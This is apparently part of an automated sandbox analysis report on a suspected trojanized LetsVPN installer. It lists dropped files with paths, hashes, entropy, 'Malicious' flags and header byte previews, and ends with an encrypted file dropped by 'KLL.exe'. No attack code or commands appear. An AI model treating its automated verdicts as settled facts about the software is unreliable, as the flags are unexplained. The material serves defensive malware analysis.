SSDEEP:	3072:yqMrTPTNy56J4JQSfB6yRkkGvaYhfls6DREtfw6aQ59hc:yNPTQ6Ga+BtakGvVEtCOhc
MD5:	30FCCFBD9F0988ADA9C87072C565F1C5
SHA1:	98D75EBCBAF23A4914CD475C14918432C89C7F92
SHA-256:	F65A5AF7997ED93583243C245237C09A088D00C63268287CDCC05028A9BDF57A
SHA-512:	BBF9F0F9CD33631F2A548F367F5BDDCFCAF58EA3391A327FE0B3A2FE88AEAE86F093B91BFF9BF0B9B7010240D2DF2EC6EDA3AEF0DED1BB14FF39A29E51938226
Malicious:	false
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......`.........." ................P9.......................................p............`A........................................G.......9...(....P...................+...`......D...........................(....1..0..................8........................text............................... ..`.rdata.......0......................@..@.data...............................@....pdata..............................@..@.00cfg..(.... ......................@..@.tls.........0......................@..._RDATA.......@......................@..@.rsrc........P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\app-3.7.0\x86\WebView2Loader.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112616
Entropy (8bit):	6.526884991962997
Encrypted:	false
SSDEEP:	3072:hlzhJmad5M+ekPfJFVwKrSDnuP7HCt+/NyIDfEtPsn/j481Jhc:hlzqaHM+eCTrSDuP7ZbEtUnr51Jhc
MD5:	065E6B499AA4E746E189A763A62FDD36
SHA1:	A053AE3E8D86A8399E689E76614412112EC67DA7
SHA-256:	10335A1F61B0C6DEBCAE682DCA6E456CF515C744A70B3E63A21E9577ADA11317
SHA-512:	EE40EE00536A806053DBC09498F70699988D90B0466E26D4B842D2D04A5FFB9F550329B0431B432258CFE3D20D13C4ED6D426734B3713C2931E589DB253B5DF9
Malicious:	false
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......`.........."!.................4....................................................@A.........................k.......l..(........................+......L...Ph.......................f......`...............8n..8....i.......................text...e........................... ..`.rdata...k.......l..................@..@.data................d..............@....00cfg...............n..............@..@.tls.................p..............@....voltbl.H............r...................rsrc................t..............@..@.reloc..L............z..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\app-3.7.0\zh-CN\LetsPRO.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	58856
Entropy (8bit):	6.2824901287107195
Encrypted:	false
SSDEEP:	768:J0/zwwtNGdrRXT6oqSvMGG4f0euQnlt41BOUAw/KENAMxJh:Yzwe+1eoqaO4f05+ltFUAwrxf
MD5:	6E6BB5F1812895826B6EBB85864D1183
SHA1:	AB6F508FBE8E52C3E573139554910378EDD3CEB9
SHA-256:	A596ABADAFFDE49030BD28C86DDD49659DE89FBC491E129F571FDE161D2436E3
SHA-512:	0A2897B21C74F019EC93CB889BEC7556F46485C6E86C70A1FD996BA22EB4DC4CA414DD6921A1C53F3C57F5890EB5F5F16F7009327631A83CF2A605DB5F6A959D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....};f...........!..................... ........... ....................... ............@.....................................S........................+........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p...(...........P .............................................................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.4.E.:.....u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....J.[..H.......1..&...+.@..s.............7.Tk[......ue./.N..:...v....F.b.b.S^m.........pE...k....D.../L.e..-...<r.......a...........

C:\Program Files (x86)\letsvpn\app-3.7.0\zh-HK\LetsPRO.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	59368
Entropy (8bit):	6.250778881491314
Encrypted:	false
SSDEEP:	768:10/zwwmSLGdKS2BUk1GXjgCEbOZ6zpcO+6jcHyYqwAw/KENAMxR5:EzweIKf+kyjgC2U++OcHWwAwrxR5
MD5:	0ED1039C803117E7F1EE77A66E39032C
SHA1:	E37C7D215FD6404932B7E09528CE47978E4E6B3A
SHA-256:	B1C02DE95565AF3026675B4DDB224EB976EB244F8F814F7413758A02ABA99A04
SHA-512:	711B678F342F8231E1F2AC6D58E608DDB8382246BDCA98F22B40667B0132753C9D9A7B3FA6681D48168A7162C2654BC00E7336FBF4BC6C0BF9E79950A6407336
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....};f...........!..................... ........... ....................... .......a....@.....................................W........................+........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........(...........P ..J...........................................F..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.4.E.:.....u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....J.[..H.......1..&...+.@..s.............7.Tk[......ue./.N..:...v....F.b.b.S^m.........pE...k....D.../L.e..-...<r.......a...........

C:\Program Files (x86)\letsvpn\app-3.7.0\zh-Hans\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	19944
Entropy (8bit):	6.9192612268553875
Encrypted:	false
SSDEEP:	384:GX3HhVhLu4y8VWe6lW+GpwKANynsAw/98E9VF3AM+op1ZT+9:E3h/aVAw/KENAMxTdG
MD5:	B2DAD50023AB7A545088F2807A312AC8
SHA1:	C4FED772FB95B1DCC416ABA1B1944CD1801B95BB
SHA-256:	D82DA0613998ABF7F3833F8F53177D0D478E8A7CF958A60D22589BEDC1BDD6EF
SHA-512:	2AE415C4DA40453CF9D18B2BC36A6478C073E17E5F36A029A9936D88AF346F00C563BC7FF4D1DFD6211A1D09603E6AD4EE36719A63DCB5F918115FD7DC1136DC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R]..........." ..0..............7... ...@....... ....................................@.................................h7..O....@..............."...+...`......L7............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H.......P ...............%.......6......................................BSJB............v4.0.30319......l...D...#~......(...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

C:\Program Files (x86)\letsvpn\app-3.7.0\zh-Hant\System.Web.Services.Description.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	19944
Entropy (8bit):	6.91886497267212
Encrypted:	false
SSDEEP:	384:D/wkIv2FCcTWe6lWW/pwKANynsAw/98E9VF3AM+oLPaDft3J:jgdUAw/KENAMxLExJ
MD5:	A98A381BDBB31FA9E36425006F7BE384
SHA1:	8275B6074DEF0CA3AC0A80537C413B7D0504316F
SHA-256:	6400DEBDBA363394415FD453A2506B917BCE25671F63B064D278E1C04725B120
SHA-512:	97FA4D6FD6857F7B52CF76A9E08E66B6A9110B84455ED5DAAC9E538D96030242A1FA17CA397D2BEFF74FB06F2226D7050C6FB06B5D45C5C7EF1FE47EE95E2BDA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L............" ..0..............7... ...@....... ....................................@.................................`7..O....@..............."...+...`......D7............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................7......H.......P ...............%.......6......................................BSJB............v4.0.30319......l...D...#~......(...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

C:\Program Files (x86)\letsvpn\app-3.7.0\zh-MO\LetsPRO.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	59368
Entropy (8bit):	6.25029903248847
Encrypted:	false
SSDEEP:	768:y0/zwwmSLGdKS2BUk1GXjgCEbOZ6zpcO+6jcHyLqeAw/KENAMxcSK:fzweIKf+kyjgC2U++OcH5eAwrxcSK
MD5:	C2D1CD0877E5B4B8B1155EA9438D0696
SHA1:	F6C80160ED25F1F31775AF663135A2550457EE73
SHA-256:	CDE72E846C830CE5EE7CFD7E79DC9BB9D4C5EC2518714A8A528B90B2DBD8940F
SHA-512:	80FB5EF3A3B3DD63541E88446BB9C1BA11847456B4CE34C59CE789209F0FD999D88FED2FBCC2EB07443A883A151CB71343FC49101D06A2A94AA9FA853C1B79F4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....};f...........!..................... ........... ....................... .......2....@.....................................W........................+........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........(...........P ..J...........................................F..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.4.E.:.....u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....J.[..H.......1..&...+.@..s.............7.Tk[......ue./.N..:...v....F.b.b.S^m.........pE...k....D.../L.e..-...<r.......a...........

C:\Program Files (x86)\letsvpn\app-3.7.0\zh-SG\LetsPRO.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	58856
Entropy (8bit):	6.2826634461561195
Encrypted:	false
SSDEEP:	768:X0/zwwtNGdrRXT6oqSvMGG4f0euQnlt41UOdAw/KENAMxFn:Ozwe+1eoqaO4f05+lt8dAwrxFn
MD5:	81F516B83BEA344D14C88055FC274B42
SHA1:	DA54E97A3C85996452A7A7E8BD1EC05A688605ED
SHA-256:	FA1A4A6D892C10B223671BBF06616222CDF03647DEE7CEAD3CB9C3FE8659C039
SHA-512:	9CBF4DBC80661EFC9D48EFC608DA88B8B613E145D4ED8E81AD21DB0E80EEBA55F138C8CB99C2444C8AE509DC82721C3FD48654B8D3D9EFE3D122CE7D582C7D84
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....};f...........!..................... ........... ....................... ......G.....@.....................................S........................+........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p...(...........P .............................................................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.4.E.:.....u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....J.[..H.......1..&...+.@..s.............7.Tk[......ue./.N..:...v....F.b.b.S^m.........pE...k....D.../L.e..-...<r.......a...........

C:\Program Files (x86)\letsvpn\app-3.7.0\zh-TW\LetsPRO.resources.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	59368
Entropy (8bit):	6.251445115242629
Encrypted:	false
SSDEEP:	768:C0/zwwmSLGdKS2BUk1GXjgCEbOZ6zpcO+6jcHy3qCAw/KENAMxW:vzweIKf+kyjgC2U++OcHJCAwrxW
MD5:	9A1E323CA028F5F6D7395B69181001F3
SHA1:	9D7D1EA76A24D0153F13D866BF1A73138E9742E4
SHA-256:	FE39DEB6FC7FE9900B92A4F258942D46AB61A9D2BFE81D768814EFBAEA048D76
SHA-512:	5BD56A2860B5F88B00342A8707D80D2D8C1143888A190D2C8CF8CDB9D43469E52172DDA326E54A4CCBD325A9FCAB5B80982B0E2145EE05A20D4CB3ED1845AB9B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....};f...........!..................... ........... ....................... ......b.....@.....................................W........................+........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........(...........P ..J...........................................F..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.S9.a.......dx.4.E.:.....u..n."..iP...T..:K..c7... ..n......Mn...~..*k;.E....J.[..H.......1..&...+.@..s.............7.Tk[......ue./.N..:...v....F.b.b.S^m.........pE...k....D.../L.e..-...<r.......a...........

C:\Program Files (x86)\letsvpn\driver\OemVista.inf

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	7632
Entropy (8bit):	5.063558190257152
Encrypted:	false
SSDEEP:	192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
MD5:	26009F092BA352C1A64322268B47E0E3
SHA1:	E1B2220CD8DCAEF6F7411A527705BD90A5922099
SHA-256:	150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
SHA-512:	C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
Malicious:	false
Preview:	; ***************************************************************************..; Copyright (C) 2002-2014 OpenVPN Technologies, Inc. ..; This program is free software; you can redistribute it and/or modify ..; it under the terms of the GNU General Public License version 2 ..; as published by the Free Software Foundation. ..; *************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*******************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

C:\Program Files (x86)\letsvpn\driver\tap0901.cat

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	data
Category:	dropped
Size (bytes):	10739
Entropy (8bit):	7.214364446291792
Encrypted:	false
SSDEEP:	192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
MD5:	F73AC62E8DF97FAF3FC8D83E7F71BF3F
SHA1:	619A6E8F7A9803A4C71F73060649903606BEAF4E
SHA-256:	CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
SHA-512:	F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
Malicious:	false
Preview:	0.)....H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

C:\Program Files (x86)\letsvpn\driver\tap0901.sys

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39920
Entropy (8bit):	6.338128217115975
Encrypted:	false
SSDEEP:	768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
MD5:	C10CCDEC5D7AF458E726A51BB3CDC732
SHA1:	0553AAB8C2106ABB4120353360D747B0A2B4C94F
SHA-256:	589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
SHA-512:	7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\driver\tapinstall.exe

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	101536
Entropy (8bit):	5.597950959538587
Encrypted:	false
SSDEEP:	1536:ImYSYxGfIZnRnD6M7EFOUakPhtUn6KXF4O7WfvZt9c:HYFZnRDGdvPXU6K1RW
MD5:	1E3CF83B17891AEE98C3E30012F0B034
SHA1:	824F299E8EFD95BECA7DD531A1067BFD5F03B646
SHA-256:	9F45A39015774EEAA2A6218793EDC8E6273EB9F764F3AEDEE5CF9E9CCACDB53F
SHA-512:	FA5CF687EEFD7A85B60C32542F5CB3186E1E835C01063681204B195542105E8718DA2F42F3E1F84DF6B0D49D7EEBAD6CB9855666301E9A1C5573455E25138A8B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V........-.....;......<.......+....%......S....%......2....~......,.....)...Rich..........PE..d...<..W..........".................Tv............................................... ....@.......... ..................................................h.......l....D...H...p..........................................................X............................text............................... ..`.data...............................@....pdata..l...........................@..@.rsrc...h...........................@..@.reloc..z....p.......B..............@..B................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\ndp462-web.exe

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1429344
Entropy (8bit):	7.9320530592846135
Encrypted:	false
SSDEEP:	24576:8XWYAlLlqSmtLvUDSRbm4Jah1rVxzY8Ja1xbLAAAOurzXuV1F+eAXvUS1vlPA:8mYAlLfeTUDBzrVxzYTOTOu3Xu5AX/l4
MD5:	B5A67867CDCE86E09E2625A6FA4D5FEA
SHA1:	C42E6ED280290648BBD59F664008852F4CFE4548
SHA-256:	5E21C85034311C51D8B0367A773D475AF2392B3DDCD90676C61697C6B5FD2E6A
SHA-512:	31D7081BFFEEB5F32457096E51A29236306E5D971DE7EDB80A51188BCCDA9B9F17F0C3593D30828FC140B7A023F5B6842BC922F2023C7B8EA3786C2DBEC40472
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......So....x...x...x.......x.0.....x......x.xx..<.x.xx....x.xx..~.x......x...y...x.....Q.x.......x.......x.......x.Rich..x.........................PE..L.....\V.........."......l...t...................@..........................@.......)....@...... ..................`z...................................>..........@................................V..@............................................text....j.......l.................. ..`.data...@7...........p..............@....idata..H...........................@..@.boxld01............................@..@.rsrc............ ..................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\letsvpn\packages\RELEASES

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	5.030867078172115
Encrypted:	false
SSDEEP:	3:1hhloYBl+zVfQ2OsJ1ERxrGE6:tlJlmfQ21ELGJ
MD5:	BC5CCF47A41F4A2D1E17D3A946107982
SHA1:	6A367ADCF75314100E39639A955063664704196D
SHA-256:	38336F464063498B67372D863050F610E9EE4AF0C7FCE89B4CF7A959D5B0C065
SHA-512:	CC79F94DCBE5C2F8C1B2B8872957FF7D1355FF3D1DF436797528EB2C12F8C0DECF19554B69551E1CB2F8BAB4E8EBC3CAB32BEC7D00F047D75527C46990EC0730
Malicious:	false
Preview:	.16D8F0925B586BA4517ED4B3A0C86F0D350F75E0 SquirrelLetsVPN-3.7.0-full.nupkg 12608658

C:\Program Files (x86)\letsvpn\uninst.exe

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	108432
Entropy (8bit):	7.184393453515108
Encrypted:	false
SSDEEP:	3072:9TJ4TJdRVDZ6Lt+uweLlt3cgATZ+eWeH+BC/UN73qXwF:9VGdx6x/xJcgGZ+sUN73qXY
MD5:	A64ABDF54C91128B79BA4426032AAEED
SHA1:	89401C1AF279E122BBEAFB120B3EF53EEABE42F9
SHA-256:	6579DEA98961E4866FABA94B4BC202E732A2A48DDE07BDC497B2E9562134AD80
SHA-512:	A6881E493C9ED0021D04B5DD9B00184CA28192A21A3450F48EBB835FBEEED2CB327281EE9ACEA711AEBF2E464CFB62BF982447D54EEC1A7BFC4E1DCE500B6B38
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h...........3............@..........................@...........@..........................................p..............@....+...........................................................................................text...'f.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata... ...P...........................rsrc........p......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.35901589905449205
Encrypted:	false
SSDEEP:	6:6xKdoaaD0JOCEfMuaaD0JOCEfMKQmDCexKdoaaD0JOCEfMuaaD0JOCEfMKQmDC:6aaD0JcaaD0JwQQHaaD0JcaaD0JwQQ
MD5:	C788EDB928436D0CE10A5BF198837D8A
SHA1:	F104B6AB797E0B16362BFB69F5000407CE6EFFD8
SHA-256:	E309925E38D727B91C5B0AD9FC86A778ECD0EBE80261F55E870AD6685B0CC0BD
SHA-512:	61F750C97F2E1EAF623486147F55B4BF39C34DF28DD124FA378973965A2AE0AAA967D71C88BE0D02E1B2D2B22E20199B9E817BE793A10C0CC9D12FE703E18CF2
Malicious:	false
Preview:	*.>...........k.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................k.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7304324763875307
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0M:9JZj5MiKNnNhoxuR
MD5:	70BAB9A0DCE61225C8FAA94C667A75F0
SHA1:	E7D5D93DF08E3A8066747892BE346BE29BFBB5C2
SHA-256:	AAA9648303B5832B05232916752D3082138ACDCFA46D9ACCADF48E24E7D1C9D3
SHA-512:	D0A5B5DD6458B703BB7E882C514B1CA26F2F5D0FA99773E4D5760378B092AEC2FAD3F304C6F601DD871276CE3419F061E24928BC5855EC0A705C0D500326BC0C
Malicious:	false
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x1625ad6e, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6290999916694777
Encrypted:	false
SSDEEP:	1536:vSB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:vaza9iJa+2UtmOQOL
MD5:	F325F41C3F1CB8CB777B5F21C1043E7B
SHA1:	33CDD548302451F25609AE6BE24B93E06B3E8018
SHA-256:	D21222258CB871E70C28A6B0059E3E3D6006EBDDE7A372E9A329CA61BC950EB2
SHA-512:	B20889D1D4A047977E50744B153268493E82BB8134C7192B5BBD568E75C277ABAAAB95215DD0773DDC1F5A31473542E34BC073DAEEE760A0508E20A3AD352D70
Malicious:	false
Preview:	.%.n... .......P.......X\...;...{......................0.j.....% ...\|..3....\|..h.g.....% ...\|..0.j.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................(..% ...\|.....................% ...\|...........................#......0.j.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07977167492362655
Encrypted:	false
SSDEEP:	3:FgdmtWetYehm5P0///4rxjARxbcFKTVyxb///ollHol///lZMPCyH:Pzhw0QljAIFKxyxLApo5
MD5:	B86D6CA1B5FFE5798ADEEED3BC2B66F7
SHA1:	D599DD5F3F903E6D0DECC992A5D1D9CDCBA882F5
SHA-256:	C363FE55EFC5A0AF521C7570CD151234D2C086F91981AEA16A5ADD960A21634D
SHA-512:	5B252467A1DB1E36477A7075422B967311A2FE6CE708640638880E8D5502D3C15C233AFF93A0A471C35787F0AFEBBB65C55D742083F5A20B9561B369B0E6BE48
Malicious:	false
Preview:	.........................................;...{..3....\|..% ...\|..........% ...\|..% ...\|....o.% ...\|.....................% ...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\SQBg9\KQ3ts~m8\SK.TXT

Download File

Process:	C:\Users\user\Desktop\KLL.exe
File Type:	data
Category:	dropped
Size (bytes):	209640
Entropy (8bit):	7.999152537836755
Encrypted:	true
SSDEEP:	3072:1GBlmbO8lK2vI7qlRYMLnP6j7BLM9yg80idIlVW0QonaJsKc7VU68REgiWpdyj6o:OmbO8l1KYb72BLMcgNi+9QYav8N8R/yH
MD5:	05A8E84B7CE0E60EA6DCF1B42889A4CB
SHA1:	8E329C32770E175C1095D01DD0C1DE240D8D9BDF
SHA-256:	EE09FC18BE985FC13130825EFF2226823481EB3F30D7E413FFB66B6722C21B1D
SHA-512:	7318CC57C4917DB8847ADA6A5E8D3F20BE42F488962BE6BBFD1AD39430F9C2298B36C4D7916EA5E6012AE8770C4FF0BB8A6E6B4CAAC0CB8801B8157B35DB3FBF
Malicious:	false
